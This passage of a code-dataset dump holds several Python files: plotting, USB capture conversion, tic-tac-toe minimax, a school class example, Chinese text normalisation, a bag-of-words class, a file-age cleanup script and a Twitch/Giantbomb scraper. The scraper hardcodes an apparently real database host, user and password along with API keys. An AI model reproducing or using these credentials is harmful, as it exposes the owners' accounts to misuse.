label_type}\n true_positive = {k:[] for k in label_type} \n \n for idx in range(len(true_y)):\n if true_y[idx] != pred_y[idx]:\n false_negative[true_y[idx]].append((idx,pred_y[idx]))\n 
false_positive[pred_y[idx]].append((idx,true_y[idx])) \n        else:\n            true_positive[true_y[idx]].append(idx)\n    \n    for cat in false_negative:\n        false_negative[cat]=unique_by_key(false_negative[cat], key=itemgetter(1))\n\n    for cat in false_positive:\n        false_positive[cat]=unique_by_key(false_positive[cat], key=itemgetter(1))\n    \n    fig, axes = plt.subplots(nrows=16, ncols=5, figsize=(12, 30))\n\n    axes[0][0].axis('off')\n    \n    for idx, cat in enumerate(label_type):\n        \n        axes[idx+1][1].axis('off')\n        axes[idx+1][1].imshow(train_dict[cat])\n        \n        axes[idx+1][2].axis('off')\n        if len(true_positive[cat])!=0:\n            axes[idx+1][2].imshow(test[true_positive[cat][0]])\n        \n        axes[idx+1][3].axis('off')\n        if len(false_positive[cat])!=0:\n            axes[idx+1][3].set_title(false_positive[cat][0][1])\n            axes[idx+1][3].imshow(test[false_positive[cat][0][0]])\n        \n        axes[idx+1][4].axis('off')\n        axes[idx+1][4].patch.set_facecolor('xkcd:mint green')\n        if len(false_negative[cat])!=0:\n            axes[idx+1][4].set_title(false_negative[cat][0][1])\n            axes[idx+1][4].imshow(test[false_negative[cat][0][0]])\n        \n    for ax, row in zip(axes[1:,0], label_type):\n        ax.axis('off')\n        ax.set_title(row, rotation=0, size='large',fontweight='bold',loc='right')\n        \n    for ax, col in zip(axes[0][1:], [\"Sample training images\",\"Sample true positives\",\"False positives with \\ntrue label\",'False negatives with \\nwrong predicted label']):\n        ax.axis('off')\n        ax.set_title(col, rotation=0, size='large',fontweight='bold',y=-0.01)\n    \n    fig.tight_layout()\n    plt.savefig(save_dir)\n    plt.show()\n","sub_path":"Lab5/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":5521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"249978907","text":"#!/usr/bin/env python3\n#\n# Copyright 2019 The usbmon-tools Authors\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# SPDX-FileCopyrightText: © 2019 The usbmon-tools Authors\n# SPDX-License-Identifier: Apache-2.0\n\"\"\"Extract the packets from a pcapng capture in base64 format.\"\"\"\n\nimport argparse\nimport binascii\nimport sys\n\nimport pcapng\n\n\ndef main():\n    if sys.version_info < (3, 7):\n        raise Exception(\"Unsupported Python version, please use at least Python 3.7.\")\n\n    parser = argparse.ArgumentParser()\n\n    parser.add_argument(\n        \"pcap_file\",\n        action=\"store\",\n        type=str,\n        help=\"Path to the pcapng file with the USB capture.\",\n    )\n\n    args = parser.parse_args()\n\n    with open(args.pcap_file, \"rb\") as pcap_file:\n        scanner = pcapng.FileScanner(pcap_file)\n        for block in scanner:\n            if isinstance(block, pcapng.blocks.InterfaceDescription):\n                if (\n                    block.link_type\n                    != pcapng.constants.link_types.LINKTYPE_USB_LINUX_MMAPPED\n                ):\n                    raise Exception(\n                        f\"In file {args.pcap_file}: expected USB capture, \"\n                        f\"found {block.link_type_description}.\"\n                    )\n            elif isinstance(block, pcapng.blocks.EnhancedPacket):\n                assert block.interface_id == 0\n                _, _, payload = block.packet_payload_info\n                print(binascii.b2a_base64(payload, 
newline=False).decode(\"ascii\"))\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"usbmon/tools/pcapng2base64.py","file_name":"pcapng2base64.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"559318944","text":"from game_controls import winner\nfrom game_controls import update_board\nimport copy\nimport math\n\n\ndef invert(val):\n    if val == 'O':\n        return 'X'\n    elif val == 'X':\n        return 'O'\n\n\ndef get_available_moves(board):\n    moves = []\n    for i in range(0, 3):\n        for j in range(0, 3):\n            if board[i][j] is None:\n                moves.append((j, i))\n    return moves\n\n\ndef minimax_score(player, board, alpha, beta):\n    available_moves = get_available_moves(board)\n    if winner('X', board):\n        return math.inf\n    elif winner('O', board):\n        return -math.inf\n    elif not available_moves:\n        return 0\n    if player == 'X':\n        best_score = -math.inf\n        for move in available_moves:\n            sample_board = copy.deepcopy(board)\n            update_board(player, move, sample_board)\n            score = minimax_score('O', sample_board, alpha, beta)\n            best_score = max(best_score, score)\n            alpha = max(alpha, best_score)\n            if beta <= alpha:\n                break\n        return best_score\n    else:\n        best_score = math.inf\n        for move in available_moves:\n            sample_board = copy.deepcopy(board)\n            update_board(player, move, sample_board)\n            score = minimax_score('X', sample_board, alpha, beta)\n            best_score = min(best_score, score)\n            beta = min(beta, best_score)\n            if beta <= alpha:\n                break\n        return best_score\n\n\ndef tra_ai_move(board):\n    move_to_make = None\n    max_score = None\n    moves = get_available_moves(board)\n    for move in moves:\n        sample_board = copy.deepcopy(board)\n        update_board('X', move, sample_board)\n        score = minimax_score('O', sample_board, -math.inf, math.inf)\n        if max_score is None or score > max_score:\n            max_score = score\n            move_to_make = move\n    return move_to_make\n","sub_path":"src/trained_AI.py","file_name":"trained_AI.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"509089451","text":"#!/usr/bin/env python3\n# author:Alnk(李成果)\n\n\nclass School(object):\n    '''School class'''\n\n    def __init__(self, name, addr):\n        self.name = name\n        self.addr = addr\n        self.students = []\n        self.staffs = []\n\n    def enroll(self, stu_obj):\n        '''Enroll a student'''\n        print('Processing enrollment for student %s' % stu_obj.name)\n        self.students.append(stu_obj)\n\n    def hire(self, staff_obj):\n        '''Hire a staff member'''\n        self.staffs.append(staff_obj)\n        print('Hired new staff member %s' % staff_obj.name)\n\n\nclass SchoolMember(object):\n    '''Base class for teachers and students'''\n\n    def __init__(self, name, age, sex):\n        self.name = name\n        self.age = age\n        self.sex = sex\n\n    def tell(self):\n        '''Print one's own personal information'''\n        pass\n\n\nclass Teacher(SchoolMember):\n    '''Teacher class'''\n\n    def __init__(self, name, age, sex, salary, course):\n        super(Teacher, self).__init__(name, age, sex)\n        self.salary = salary\n        self.course = course\n\n    def tell(self):\n        print('''\n        --- info of Teacher: %s ---\n        name:%s\n        age:%s\n        sex:%s\n        salary:%s\n        course:%s\n        ''' % (self.name, self.name, self.age, self.sex, self.salary, self.course))\n\n    def teach(self):\n        print('%s is teaching course [%s]' % (self.name, self.course))\n\n\nclass Student(SchoolMember):\n    '''Student class'''\n\n    def __init__(self, name, age, sex, stu_id, grade):\n        super(Student, self).__init__(name, age, sex)\n        self.stu_id = stu_id\n        self.grade = grade\n\n    def tell(self):\n        print('''\n        --- info of Student: %s ---\n        name:%s\n        age:%s\n        sex:%s\n        stu_id:%s\n        grade:%s\n        ''' % (self.name, 
self.name, self.age, self.sex, self.stu_id, self.grade))\n\n    def pay_tuition(self, amount):\n        '''Pay tuition'''\n        print('%s has paid tuition for $[%s]' % (self.name, amount))\n\n\nschool = School(\"老男孩IT\", '沙河')  # instantiate a school\n\nt1 = Teacher('oldboy', 56, 'mf', 20000000, 'linux')  # instantiate a teacher\nt2 = Teacher('alex', 32, 'm', 3000, 'pythondevops')  # instantiate a teacher\n\ns1 = Student('tom', 22, 'mf', 1001, 'pythondevops')  # instantiate a student\ns2 = Student('xu', 19, 'mf', 1002, 'linux')  # instantiate a student\n\nt1.tell()  # call the Teacher class tell method\ns1.tell()  # call the Student class tell method\n\nschool.hire(t1)  # call the School class hire method to hire oldboy\nschool.enroll(s1)\nschool.enroll(s2)\n\nprint(school.staffs)  # check how many teachers were hired; this prints memory addresses\nprint(school.students)  # check how many students enrolled; this prints memory addresses\nprint('Name of the hired teacher:', school.staffs[0].name)\nprint('Names of the enrolled students:', school.students[0].name, school.students[1].name)\n\nschool.staffs[0].teach()  # have the teacher start teaching; school.staffs[0] is t1 because school.hire(t1) appended it to self.staffs\nt1.teach()\n\nfor stu in school.students:  # school.students = [s1,s2]\n    stu.pay_tuition(5000)\nprint(type(school.students))\n","sub_path":"day06/01笔记/07继承示例-学校.py","file_name":"07继承示例-学校.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"40514615","text":"\"\"\"\nMainly full-width to half-width conversion\nand Traditional-to-Simplified Chinese conversion.\nStill to do: truncation, and upper- to lower-case conversion.\n\n\"\"\"\n\n\nfrom langconv import *\n\ndef is_chinese(uchar):\n    \"\"\"Check whether a unicode character is a Chinese character\"\"\"\n    if uchar >= u'\\u4e00' and uchar<=u'\\u9fa5':\n        return True\n    else:\n        return False\n\ndef is_number(uchar):\n    \"\"\"Check whether a unicode character is a half-width digit\"\"\"\n    if uchar >= u'\\u0030' and uchar <= u'\\u0039':\n        return True\n    else:\n        return False\ndef is_alphabet(uchar):\n    \"\"\"Check whether a unicode character is a half-width English letter\"\"\"\n    if (uchar >= u'\\u0041' and uchar <= u'\\u005a') or (uchar >= u'\\u0061' and uchar <= u'\\u007a'):\n        return True\n    else:\n        return False\n\ndef is_Qalphabet(uchar):\n    \"\"\"Check whether a unicode character is a full-width English letter\"\"\"\n    if (uchar >= u'\\uff21' and uchar <= u'\\uff3a') or (uchar >= u'\\uff41' and uchar <= u'\\uff5a'):\n        return True\n    else:\n        return False\n\ndef is_Qnumber(uchar):\n    \"\"\"Check whether a unicode character is a full-width digit\"\"\"\n    if uchar >= u'\\uff10' and uchar <= u'\\uff19':\n        return True\n    else:\n        return False\ndef B2Q(uchar):\n    \"\"\"Convert a single character from half-width to full-width\"\"\"\n    inside_code = ord(uchar)\n    if inside_code < 0x0020 or inside_code > 0x7e:  # not a half-width character, return it unchanged\n        return uchar\n    if inside_code == 0x0020:  # except for space, the conversion formula is: half-width = full-width - 0xfee0\n        inside_code = 0x3000\n    else:\n        inside_code += 0xfee0\n    return chr(inside_code)\n\n\ndef Q2B(uchar):\n    \"\"\"Convert a single character from full-width to half-width\"\"\"\n    inside_code = ord(uchar)\n    if inside_code == 0x3000:\n        inside_code = 0x0020\n    else:\n        inside_code -= 0xfee0\n    if inside_code < 0x0020 or inside_code > 0x7e:  # if the result is not a half-width character, return the original\n        return uchar\n    return chr(inside_code)\n\ndef stringQ2B(ustring):\n    \"\"\"Convert all full-width characters in a string to half-width\"\"\"\n    return \"\".join([Q2B(uchar) for uchar in ustring])\n\ndef stringpartQ2B(ustring):\n    \"\"\"Convert full-width digits and letters in a string to half-width\"\"\"\n    return \"\".join([Q2B(uchar) if is_Qnumber(uchar) or is_Qalphabet(uchar) else uchar for uchar in ustring])\ndef is_other(uchar):\n    \"\"\"Check whether a character is not a Chinese character, digit or English letter\"\"\"\n    if not (is_chinese(uchar) or is_number(uchar) or is_alphabet(uchar)):\n        return True\n    else:\n        return False\n\ndef Traditional2Simplified(sentence):\n    '''\n    Convert the Traditional Chinese characters in sentence to Simplified Chinese\n    :param sentence: the sentence to be converted\n    :return: the sentence with its Traditional characters converted to Simplified\n    '''\n    sentence = Converter('zh-hans').convert(sentence)\n    return sentence\n\n\n\n\nif __name__ == '__main__':\n    text = \"电影《2012》讲述了2012年12月21日的世界末日,主人公Jack以及世界各国人民挣扎求生的经历,灾难面前,尽现人间百态。\"\n\n    print(\"original text:\", text, sep=\"\\n\", end=\"\\n\")\n    text1 
= stringQ2B(text)\n    print(\"full-width to half-width:\", text1, sep=\"\\n\", end=\"\\n\")\n    text2 = stringpartQ2B(text)\n    print(\"digits/letters full-width to half-width:\", text2, sep=\"\\n\", end=\"\\n\")\n\n    traditional_sentence = '憂郁的臺灣烏龜'\n    simplified_sentence = Traditional2Simplified(traditional_sentence)\n    print(simplified_sentence)\n","sub_path":"preprocessing/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":3263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"359804602","text":"\"\"\"\nCopyright (c) 2016 Jet Propulsion Laboratory,\nCalifornia Institute of Technology. All rights reserved\n\"\"\"\n# distutils: include_dirs = /usr/local/lib/python2.7/site-packages/cassandra\nimport pyximport\n\npyximport.install()\n\nfrom webservice.NexusHandler import NexusHandler, nexus_handler, DEFAULT_PARAMETERS_SPEC\nfrom webservice.webmodel import NexusResults\n\n\n@nexus_handler\nclass DataInBoundsSearchHandlerImpl(NexusHandler):\n    name = \"Data In-Bounds Search\"\n    path = \"/datainbounds\"\n    description = \"Fetches point values for a given dataset and geographical area\"\n    params = DEFAULT_PARAMETERS_SPEC\n    singleton = True\n\n    def __init__(self):\n        NexusHandler.__init__(self)\n\n    def calc(self, compute_options, **args):\n        min_lat = compute_options.get_min_lat()\n        max_lat = compute_options.get_max_lat()\n        min_lon = compute_options.get_min_lon()\n        max_lon = compute_options.get_max_lon()\n        ds = compute_options.get_dataset()[0]\n        start_time = compute_options.get_start_time()\n        end_time = compute_options.get_end_time()\n        includemeta = compute_options.get_include_meta()\n\n        tiles = self._tile_service.get_tiles_bounded_by_box(min_lat, max_lat, min_lon, max_lon, ds, start_time,\n                                                            end_time)\n\n        data = []\n        for tile in tiles:\n            for nexus_point in tile.nexus_point_generator():\n                data.append({\n                    'latitude': nexus_point.latitude,\n                    'longitude': nexus_point.longitude,\n                    'time': nexus_point.time,\n                    'data': [\n                        {\n                            'id': tile.tile_id,\n                            'value': nexus_point.data_val\n                        }\n                    ]\n                })\n\n        if includemeta and len(tiles) > 0:\n            meta = [tile.get_summary() for tile in tiles]\n        else:\n            meta = None\n\n        result = NexusResults(\n            results=data,\n            stats={},\n            meta=meta)\n\n        result.extendMeta(min_lat, max_lat, min_lon, max_lon, \"\", start_time, end_time)\n\n        return result\n","sub_path":"analysis/webservice/algorithms/DataInBoundsSearch.py","file_name":"DataInBoundsSearch.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"413925481","text":"import os\r\nimport shutil\r\nimport time\r\n\r\npath = input(\"Enter the path of folder to delete: \")\r\ndays = 30\r\nseconds = time.time() - (days * 24 * 60 * 60)\r\npath = path + \"/\"\r\n\r\nlist_of_files = os.listdir(path)\r\n\r\ndef file_time(path):\r\n\tctime = os.stat(path).st_ctime\r\n\treturn ctime\r\n\r\n\r\nif os.path.exists(path):\r\n    for file in list_of_files:\r\n        if seconds >= file_time(path + file):\r\n            os.remove(path + file)\r\n            print(\"Files deleted successfully!\")\r\n\r\n        else:\r\n            print(\"File exists less than 30 days. 
Enter a file path that exists more than 30 days.\")\r\nelse:\r\n    print(\"Entered path does not exist\")","sub_path":"removing files-99/Removefiles.py","file_name":"Removefiles.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"109408578","text":"# -*- coding: utf-8 -*-\n\n#=========================================================\n# Class: BagOfWords\n#\n# Author: Antonio Paya Gonzalez\n#\n#=========================================================\n\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nfrom __future__ import division\n\nimport nltk\n#nltk.download('punkt')\n#nltk.download('wordnet')\n#nltk.download('stopwords')\nfrom nltk import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\n\nclass BagOfWords(object):\n    def __init__(self, text=None, values=None, enable_stemming=True, filter_stopwords=True):\n        \"\"\"Constructor\n\n        If it receives a string through the text argument, it converts it to a\n        dictionary. If it receives a dictionary, it simply copies it for\n        internal use.\n        \"\"\"\n        self.enable_stemming = enable_stemming\n        self.filter_stopwords = filter_stopwords\n        self.text = text\n        if values is not None:\n            self.values = values\n        elif type(text) is dict:\n            self.values = text\n        elif type(text) is str or type(text) is unicode:\n            self.values = self.string_to_bag_of_words(text,{})\n        elif type(text) is list:\n            bag = {}\n            for i in text:\n                bag = self.string_to_bag_of_words(text, bag)\n            self.values = bag\n        else:\n            self.values = {}\n\n\n    def __str__(self):\n        \"\"\"Returns a string with the representation of the object\n\n        The object BagOfWords(“A b a”) is represented by the string\n        \"{‘a’: 2, ‘b’: 1}\"\n        \"\"\"\n        return str(self.values)\n\n    def __len__(self):\n        \"\"\"Returns the size of the dictionary\"\"\"\n        return len(self.values)\n\n    def __iter__(self):\n        \"\"\"Creates an iterator that yields the key and value of each\n        element of the dictionary\n\n        The dictionary {‘a’: 1, ‘b’: 2} yields:\n        - (‘a’, 1) on the first call\n        - (‘b’, 2) on the second call\n        \"\"\"\n        for x in self.values.iteritems():\n            yield x\n\n    def intersection(self, other):\n        \"\"\"Intersects 2 bag-of-words\n\n        The intersection of “a b c a” with “a b d” is:\n        {‘a’: 1, ‘b’: 1}\n        \"\"\"\n        keys_a = set(self.values)\n        keys_b = set(other.values)\n        intersection = {}\n        for word in keys_a & keys_b:\n            intersection[word] = min(self.values[word],other.values[word])\n        return BagOfWords(values=intersection)\n\n    def union(self, other):\n        \"\"\"Unites 2 bag-of-words\n\n        The union of “a b c a” with “a b d” is:\n        {‘a’: 3, ‘b’: 2, ‘c’: 1, ‘d’: 1}\n        \"\"\"\n        keys_a = set(self.values)\n        keys_b = set(other.values)\n        union = {}\n        for word in keys_a | keys_b:\n            val1 = self.values[word] if word in self.values else 0\n            val2 = other.values[word] if word in other.values else 0\n            union[word] = val1 + val2\n        return BagOfWords(values=union)\n\n    def document_len(self):\n        return reduce((lambda x,value: x + value),self.values.itervalues(),0)\n\n    def string_to_bag_of_words(self,text,bag):\n        \"\"\"Converts a string to a bag of words\"\"\"\n        lemmatizer = WordNetLemmatizer()\n        words = word_tokenize(text)\n        #words = [unicode(x, errors='replace') for x in words]\n        stop = set(stopwords.words('english')) if self.filter_stopwords else []\n        signosPuntuacion = [\"?\", \"¿\", \"¡\", \"!\", \" \", \",\", \".\", \";\", \":\"]\n        # Remove punctuation marks and stopwords\n        tokens = 
list(filter(lambda x: x not in signosPuntuacion and x not in stop, words))\n\n        for word in tokens:\n            word = word.lower()  # Convert to lower case\n            if self.enable_stemming:\n                word = lemmatizer.lemmatize(word)  # Lemmatize using NLTK\n            if word in bag:  # Store the word together with its number of occurrences\n                bag[word] = 1 + bag[word]\n            else:\n                bag[word] = 1\n\n        return bag\n","sub_path":"Indexador/bag_of_words.py","file_name":"bag_of_words.py","file_ext":"py","file_size_in_byte":3944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"415269371","text":"# -*- coding: utf-8 -*-\n\n### Import libraries\nfrom fuzzywuzzy import fuzz\nimport numpy as np\nimport os\nimport pandas as pd\nimport pickle\nimport re\nimport sys\n\n# !pip install -q fuzzywuzzy\n# !pip install -q fuzzywuzzy[speedup]\n\n\ndef load_mile_road_dict():\n    mile_road_dict = {'1': 'One',\n                      '2': 'Two',\n                      '3': 'Three',\n                      '4': 'Four',\n                      '5': 'Five',\n                      '6': 'Six',\n                      '7': 'Seven',\n                      '8': 'Eight',\n                      '9': 'Nine',\n                      '10': 'Ten',\n                      '11': 'Eleven',\n                      '12': 'Twelve',\n                      '13': 'Thirteen',\n                      '14': 'Fourteen',\n                      '15': 'Fifteen',\n                      '16': 'Sixteen',\n                      '17': 'Seventeen',\n                      '18': 'Eighteen',\n                      '19': 'Nineteen',\n                      '20': 'Twenty'}\n    return mile_road_dict\n\n\ndef save_resource(data, file_name,\n                  file_path=\"resources\"):\n    \"\"\" Save resource to directory\n    Args:\n        data: the data to be stored.\n        file_name (str): save data to file_name.\n        file_path (str): directory to save data. Default is ```resources```\n    Returns:\n        None\n    \"\"\"\n    # Check path exists\n    current_dir, _ = os.path.split(__file__)\n    data_path = os.path.join(current_dir+\"/../\", file_path)\n    assert (os.path.exists(data_path)), \\\n        \"Directory {} does not exist! \".format(data_path)\n\n    ### Save data\n    with open(os.path.join(data_path,file_name), 'wb') as handle:\n        pickle.dump(data, handle,\n                    protocol=pickle.HIGHEST_PROTOCOL)\n\n\ndef load_resource(file_name, rel_path=\"resources\"):\n    \"\"\" Load resource\n    Args:\n        file_name (str): full file name. This should be included in\n            ```resources``` directory.\n        rel_path (str): path to ```file_name```. Default value\n            is ```resources```.\n\n    Returns:\n        data: the data consistent with the pickle file data.\n    \"\"\"\n    # Get directory\n    current_dir, _ = os.path.split(__file__)\n    data_path = os.path.join(current_dir+\"/../\", rel_path, file_name)\n\n    # Read resource file\n    assert (os.path.exists(data_path)), \\\n        \"Resource {} does not exist! \".format(data_path)\n\n    with open(data_path, 'rb') as handle:\n        data = pickle.load(handle)\n\n    return data\n\ndef compile_re(pattern):\n    \"\"\" Compile a regular expression with pattern\n    Args:\n        pattern (str): a string representing the pattern\n            e.g. \"NoviPRD-.*\" means strings that start with \"NoviPRD-\"\n            e.g. \".*\\.csv\" means strings that end with \".csv\"\n            e.g. \".*xxx.*\" means strings that contain \"xxx\" in the middle\n\n    Returns:\n        regular expression object\n    \"\"\"\n    return re.compile(pattern)\n\n\ndef find_within(path, pattern, name_only=True):\n    \"\"\" Find fields in path with pattern\n    Args:\n        path (str): path to data\n        pattern (str): a string representing the pattern\n            e.g. \"NoviPRD-.*\" means strings that start with \"NoviPRD-\"\n            e.g. \".*\\.csv\" means strings that end with \".csv\"\n            e.g. 
\".*xxx.*\" means strings that contain \"xxx\" in the middle\n Returns:\n an iterable of files in path whose name matches with pattern\n \"\"\"\n\n assert(os.path.exists(path)), \"Path {} does not exist!\".format(path)\n regex = compile_re(pattern)\n\n for file in os.listdir(path):\n file_name = os.fsdecode(file)\n if regex.search(file_name):\n if name_only:\n yield file_name\n else:\n yield file\n\n\ndef load_df(file_name, path=\"resources\", **kwargs):\n \"\"\" Load resource\n Args:\n file_name (str): full file name. This should be included in\n ```resources``` directory.\n path (str): path to ```file_name```. Default value\n is ```resources```.\n **kwargs: kwargs to be passeed into pd.read_csv\n Returns:\n data: the data from the csv file\n \"\"\"\n # Get directory\n if os.path.exists(path):\n # this is an absolute path\n data_path = os.path.join(path, file_name)\n else:\n # this is a relative path\n current_dir, _ = os.path.split(__file__)\n data_path = os.path.join(current_dir+\"/../\", path, file_name)\n\n # Read resource file\n assert (os.path.exists(data_path)), \\\n \"Resource {} does not exist! \".format(data_path)\n if file_name.endswith('.csv'):\n df = pd.read_csv(data_path, **kwargs)\n else:\n df = pd.read_excel(data_path, **kwargs)\n\n return df\n\n\ndef load_sample(file_name=\"addresses.csv\",\n rel_path=\"resources/datasets\"):\n \"\"\" Load resource\n Args:\n file_name (str): full file name. This should be included in\n ```resources``` directory.\n rel_path (str): path to ```file_name```. Default value\n is ```resources```.\n\n Returns:\n data: the data consistant with pickle file data.\n \"\"\"\n # Get directory\n current_dir, _ = os.path.split(__file__)\n data_path = os.path.join(current_dir+\"/../\", rel_path, file_name)\n\n # Read resource file\n assert (os.path.exists(data_path)), \\\n \"Resource {} does not exist! 
\".format(data_path)\n\n\n sample = pd.read_csv(data_path)\n return sample\n","sub_path":"address_parser/resource_manager.py","file_name":"resource_manager.py","file_ext":"py","file_size_in_byte":5523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"142338912","text":"import psycopg2\nfrom psycopg2.extensions import AsIs\nimport re\nimport requests\n\n\ndef connect():\n \"\"\" db connection for psql\n\n :return: (object) psycopg2 connect\n \"\"\"\n\n conn = psycopg2.connect(\n database='dbk51u9o6si8cf',\n user='kzcphlvaszckxl',\n password='sFkISkzjGO3I3ZqiSy001Q0L9g',\n host='ec2-107-21-219-201.compute-1.amazonaws.com',\n port='5432'\n )\n return conn\n\n\ndef get_trialid():\n \"\"\" fetches highest trial id number\n\n :return: (int) trial id\n \"\"\"\n\n conn = connect()\n cur = conn.cursor()\n cur.execute('''SELECT trialid FROM snapshot ORDER BY trialid DESC LIMIT 1''')\n trialid = cur.fetchone()\n if trialid:\n trialid = trialid[0]\n else:\n trialid = 1\n conn.close()\n\n return trialid\n\n\ndef update_table(row, trialid, giantbomb):\n \"\"\" checking and updating db with game info from giantbomb\n\n\n :param row: (dict) dict of twitch json object\n :param trialid: (int) trial id number\n :param giantbomb: (object) giantbomb class object\n :return: None\n :rtype: object\n\n \"\"\"\n\n giantbomb.check_db(row['name'], row['giantbombid'])\n row['trialid'] = trialid + 1\n\n conn = connect()\n cur = conn.cursor()\n\n # adding values into snapshot table\n query = '''\n INSERT INTO snapshot VALUES (\n DEFAULT,\n %(name)s,\n %(giantbombid)s,\n %(trialid)s,\n %(rank)s,\n %(viewers)s,\n %(channels)s,\n current_timestamp\n )\n '''\n cur.execute(query, row)\n\n # updating game_name table: if no entry found add entry\n query = '''\n DO\n $do$\n BEGIN\n IF EXISTS(SELECT * FROM game_name WHERE name = %(name)s) THEN\n UPDATE game_name\n SET viewer_total = viewer_total + %(viewers)s,\n channel_total = channel_total + %(channels)s,\n rank_total = rank_total + %(rank)s,\n trials = trials + 1\n WHERE name = %(name)s;\n ELSE\n INSERT INTO game_name VALUES (\n DEFAULT,\n %(name)s,\n %(giantbombid)s,\n %(viewers)s,\n %(channels)s,\n %(rank)s,\n 1\n );\n END IF;\n END\n $do$\n '''\n cur.execute(query, row)\n conn.commit()\n conn.close()\n\n\nclass Twitch:\n \"\"\"twitch API\"\"\"\n\n def __init__(self):\n self.token = 'gl05eybq9tbzcqcqirx3ubfai4fxjk5'\n self.fields = self.set_fields\n\n @property\n def set_fields(self):\n \"\"\" api call to twitch to get data\n\n :return: (list) list of dicts of json\n \"\"\"\n\n fields = []\n headers = {'client-id': self.token}\n data = requests.get('https://api.twitch.tv/kraken/games/top', params=dict(limit=100), headers=headers).json()\n\n for index, field in enumerate(data['top']):\n row = dict(\n name=field['game']['name'],\n giantbombid=field['game']['giantbomb_id'],\n viewers=field['viewers'],\n channels=field['channels'],\n rank=index + 1\n )\n fields.append(row)\n return fields\n\n def index_name(self, name):\n \"\"\" get index matching name\n\n :param name: (str) name of game\n :return: (int) index of name in fields\n \"\"\"\n\n for index, row in enumerate(self.fields):\n if row['name'] == name:\n return index\n\n\nclass Giantbomb:\n \"\"\"giantbomb API\"\"\"\n\n def __init__(self):\n self.token = '94bbf300f268659d00d7ad890c3cadcee955a765' # api token\n self.tablenames = [('original_game_rating', 'rating'),\n ('platforms', 'platform'),\n ('franchises', 'franchise'),\n ('publishers', 'publisher'),\n ('genres', 
'genre'),\n ('themes', 'theme')]\n\n # populating db_ids and mismatch_ids from db\n self.db_ids = self.set_db_ids()\n self.mismatch_ids = self.set_mismatch_ids()\n\n def search_web(self, name, giantbombid):\n \"\"\" accesses giantbomb api for search query and returns api if giantbombid matches\n\n :param name: (str) name of game\n :param giantbombid: (int) id number of game\n :return: (str): url for api link\n \"\"\"\n\n if giantbombid == 0:\n print('no giantbombid')\n return\n else:\n url = 'http://giantbomb.com/api/search/'\n\n headers = {'user-agent': 'DataIncubatorProjectBot'}\n param = dict(\n format='json',\n resources='game',\n api_key=self.token,\n query=name\n )\n\n data = requests.get(url, params=param, headers=headers).json()\n\n for row in data['results']:\n if giantbombid == row['id']:\n return row['api_detail_url']\n print('no match found')\n return\n\n def search_mismatch(self, name):\n \"\"\" checks mismatch table for name and returns giantbombid for that name\n\n :param name: (str) name of game\n :return: (int) giantbombid\n \"\"\"\n\n data = [item[0] for item in self.mismatch_ids if item[1] == name]\n if data:\n return data[0]\n else:\n print('no match found, adding mismatch')\n fetch = self.add_mismatch(name)\n return fetch\n\n def search_name(self, name):\n \"\"\" accesses api and returns first match or returns None if none found\n\n :param name: (str) name of game\n :return: (str) api url\n \"\"\"\n\n url = 'http://giantbomb.com/api/search/'\n headers = {'user-agent': 'DataIncubatorProjectBot'}\n\n param = dict(\n format='json',\n resources='game',\n api_key=self.token,\n query=name\n )\n fields = requests.get(url, params=param, headers=headers).json()\n\n if fields['results']:\n for row in fields['results']:\n if re.search(name, row['name']):\n return row['id']\n return None\n\n def add_mismatch(self, name):\n \"\"\"adding mismatch to table\n\n :param name: (int) name of game\n :return: giantbombid (int)\n \"\"\"\n\n giantbombid = self.search_name(name)\n\n conn = connect()\n cur = conn.cursor()\n\n if not giantbombid:\n print('no match found')\n\n query = '''SELECT giantbombid FROM giantbomb ORDER BY giantbombid DESC'''\n cur.execute(query)\n fetch = cur.fetchone()\n\n if fetch[0] < 1000000:\n giantbombid = 1000000 # setting id to high value to avoid mismatch\n else:\n giantbombid = fetch[0] + 1 # setting from highest value\n\n query = '''INSERT INTO mismatch VALUES (\n DEFAULT,\n %(name)s,\n %(giantbombid)s\n )\n '''\n cur.execute(query, dict(name=name, giantbombid=giantbombid))\n conn.commit()\n conn.close()\n\n return giantbombid\n\n @staticmethod\n def set_db_ids():\n \"\"\" populates db_ids with giantbombids for searching\n\n :return: (tuple) db ids in tuple\n \"\"\"\n\n conn = connect()\n cur = conn.cursor()\n query = '''SELECT giantbombid FROM giantbomb'''\n cur.execute(query)\n fetch = cur.fetchall()\n conn.close()\n\n return fetch\n\n @staticmethod\n def set_mismatch_ids():\n \"\"\" populates mismatch_ids for searching\n\n :return: (tuple) mismatch ids\n \"\"\"\n\n conn = connect()\n cur = conn.cursor()\n query = '''SELECT giantbombid, name FROM mismatch'''\n cur.execute(query)\n fetch = cur.fetchall()\n conn.close()\n\n return fetch\n\n def check_db(self, name, giantbombid):\n \"\"\" checks db_ids for giantbombid\n if giantbombid doesn't exist search mismatch table for giantbombid\n\n :param name: (str) name of game\n :param 